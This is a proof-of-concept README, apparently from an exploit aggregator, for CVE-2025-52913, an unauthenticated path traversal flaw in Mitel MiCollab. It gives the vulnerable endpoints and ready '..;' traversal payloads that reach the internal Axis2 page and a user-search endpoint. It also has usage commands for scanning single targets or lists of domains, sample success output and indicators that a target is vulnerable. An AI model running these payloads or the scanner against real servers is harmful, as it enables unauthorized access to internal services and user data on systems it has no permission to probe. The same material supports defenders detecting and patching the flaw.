## https://sploitus.com/exploit?id=AC285A43-7636-53D5-ABFB-C9CD48B984C5
# CVE-2025-52913 - MiCollab Path Normalization Vulnerability
## ๐ Overview
This repository contains a Proof of Concept (PoC) for **CVE-2025-52913**, a path normalization vulnerability affecting Mitel MiCollab.
The issue allows unauthenticated attackers to bypass intended path restrictions by leveraging crafted URL sequences such as `..;`, leading to access to internal application endpoints.
---
## โ ๏ธ Impact
Successful exploitation may allow:
* Access to internal and restricted endpoints
* Exposure of sensitive application components
* Potential information disclosure
---
## ๐ฏ Affected Endpoints
The vulnerability can be triggered via the following paths:
```
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
```
---
## ๐ฃ Payloads
Example traversal payloads:
```
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
```
---
## ๐ Usage
### 1. Install dependencies
```
pip install -r requirements.txt
```
### 2. Run against a single target
```
python3 POC-CVE-2025-52913.py example.com
```
### 3. Run against multiple targets
```
python3 POC-CVE-2025-52913.py domains.txt
```
---
## ๐งช Example
```
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
```
---
## ๐ Detection
A target is likely vulnerable if:
* The server responds with HTTP 200
* The response contains:
* `Axis2`
* `Axis2 Happiness Page`
* Valid application output from internal endpoints
---
## ๐ ๏ธ Technical Details
The vulnerability arises from improper normalization of crafted paths containing `..;`, allowing traversal beyond the intended application context.
This behavior can expose internal services such as:
* Axis2 web services interface
* Internal user management endpoints
---
## ๐ค Discovery
Discovered by **Dahmani Toumi**
---
## ๐ References
* CVE: CVE-2025-52913
* (Add vendor advisory or NVD link when available)
---
## โ๏ธ Disclaimer
This project is intended for **educational purposes and authorized security testing only**.
Do not use this tool against systems without explicit permission.
The author is not responsible for any misuse or damage.
---